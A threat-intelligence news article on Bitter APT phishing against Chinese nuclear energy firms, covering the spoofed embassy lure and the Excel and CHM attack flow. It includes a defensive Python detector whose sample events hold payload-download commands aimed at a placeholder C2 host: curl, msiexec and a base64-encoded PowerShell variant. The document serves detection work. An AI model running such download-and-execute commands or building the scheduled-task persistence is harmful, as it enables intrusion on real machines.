
Bitter APT Espionage Group Targets Nuclear Energy Firms in China

The Bitter APT espionage group, known for targeting the energy and government sectors in South and Southeast Asia, has been observed carrying out fresh campaigns against critical organizations in China. The TTPs are consistent with its past attacks and include phishing emails carrying Excel and Compiled HTML Help (CHM) attachments.

Targeting nuclear energy firms

Intezer researchers reported that the attack begins with a fake email sent to various nuclear energy companies and academics in China, pretending to be sent by the Embassy of Kyrgyzstan in Beijing.
  • It talks about an invitation to a nuclear energy-related conference, held by the International Atomic Energy Agency (IAEA), the China Institute of International Studies (CIIS), and the Kyrgyz Embassy.
  • The email includes names of genuine officials from the Kyrgyzstan Ministry of Foreign Affairs to make it look legitimate.
  • The email urges recipients to download the attached RAR archive, which supposedly holds the invitation card for the conference. Instead, the archive contains a malicious Excel file or a CHM file.

Attack flow

The malicious Excel or CHM files are aimed at establishing persistence and downloading further payloads on the infected machine.
  • The Excel file contains an Equation Editor exploit. When opened, it creates two scheduled tasks that run every 15 minutes and download the next-stage EXE payload via curl.
  • The CHM file is used to execute arbitrary code: it creates a scheduled task that runs msiexec to fetch a remote MSI payload from the C2 server and execute it.
  • Another variant of the CHM payload uses an encoded PowerShell command to create the same scheduled task, obfuscating the activity.

Although the researchers could not capture the actual second-stage payload, it is suspected to be a keylogger, info-stealer, or RAT, as seen in previous Bitter APT attacks.
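The three scheduled-task variants described above share a detectable shape: a newly created task whose action runs curl or msiexec against a remote URL, or runs PowerShell with an encoded command that decodes to one of those. The following script is an added defender-side example (not code from Intezer or Cyware) that applies those checks to task-creation records. The `TaskCreated` record is a simplified, hypothetical subset of the fields in Windows Security event 4698, the sample events are constructed, and the C2 host is a placeholder.

```python
"""Flag scheduled-task creations matching the Bitter APT pattern:
curl or msiexec pulling from a remote URL, or an encoded PowerShell
command that decodes to the same. Sample data is constructed."""
import base64
import binascii
import re
from dataclasses import dataclass

# Living-off-the-land binaries abused in the attack flow described above.
LOLBIN = re.compile(r"\b(curl|msiexec|powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s'\"]+", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


@dataclass
class TaskCreated:
    """Hypothetical subset of Windows Security event 4698 (task created)."""
    task_name: str
    command: str    # executable the task action runs
    arguments: str  # arguments passed to that executable


def decode_encoded_powershell(arguments: str):
    """Return the plaintext of a -EncodedCommand value (base64 of UTF-16LE), or None."""
    m = ENCODED.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def analyze(event: TaskCreated) -> list:
    """Return the list of reasons this task creation looks like the Bitter APT pattern."""
    reasons = []
    exe = event.command.replace("/", "\\").rsplit("\\", 1)[-1]
    text = f"{exe} {event.arguments}"
    if ENCODED.search(event.arguments):
        decoded = decode_encoded_powershell(event.arguments)
        if decoded is None:
            reasons.append("encoded PowerShell command that could not be decoded")
        else:
            reasons.append("encoded PowerShell command (decoded for inspection)")
            text += " " + decoded  # inspect the decoded command as well
    binaries = {b.lower() for b in LOLBIN.findall(text)}
    has_url = REMOTE_URL.search(text) is not None
    if "curl" in binaries and has_url:
        reasons.append("task downloads a file with curl from a remote URL")
    if "msiexec" in binaries and has_url:
        reasons.append("task installs a remote MSI via msiexec")
    return reasons


# Constructed sample events; the C2 host is a placeholder, not a real indicator.
_C2 = "http://c2-placeholder.invalid"
_ENCODED = base64.b64encode(f"msiexec /i {_C2}/update.msi /q".encode("utf-16le")).decode()
SAMPLES = [
    TaskCreated("\\Contoso\\Updater", "C:\\Program Files\\Contoso\\updater.exe", "--check"),
    TaskCreated("\\Microsoft\\Windows\\SysUpdate", "C:\\Windows\\System32\\curl.exe",
                f"-o C:\\Users\\Public\\stage2.exe {_C2}/stage2.exe"),
    TaskCreated("\\Microsoft\\Windows\\Install", "msiexec.exe", f"/i {_C2}/update.msi /q"),
    TaskCreated("\\Microsoft\\Windows\\Maint", "powershell.exe",
                f"-NoProfile -EncodedCommand {_ENCODED}"),
]


def flagged_task_names(events=SAMPLES) -> list:
    """Names of the tasks that produced at least one reason."""
    return [e.task_name for e in events if analyze(e)]


if __name__ == "__main__":
    for e in SAMPLES:
        for reason in analyze(e):
            print(f"{e.task_name}: {reason}")
```

In production the records would come from a SIEM export of event 4698 (or Sysmon process creation of schtasks.exe); the decoding step matters because the encoded variant hides msiexec and the URL from naive string matching on the raw event.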

Concluding notes

Bitter APT has been using similar attack tactics, including phishing emails, for several years. Organizations in the Asia-Pacific region are therefore advised to stay cautious when receiving emails from unknown senders and to verify the sender's identity before proceeding. Furthermore, CHM files are rarely used by organizations and should be blocked or avoided. All the tactics used in Bitter APT attacks are well known and can be thwarted with proper awareness of current trends.
Publisher: Cyware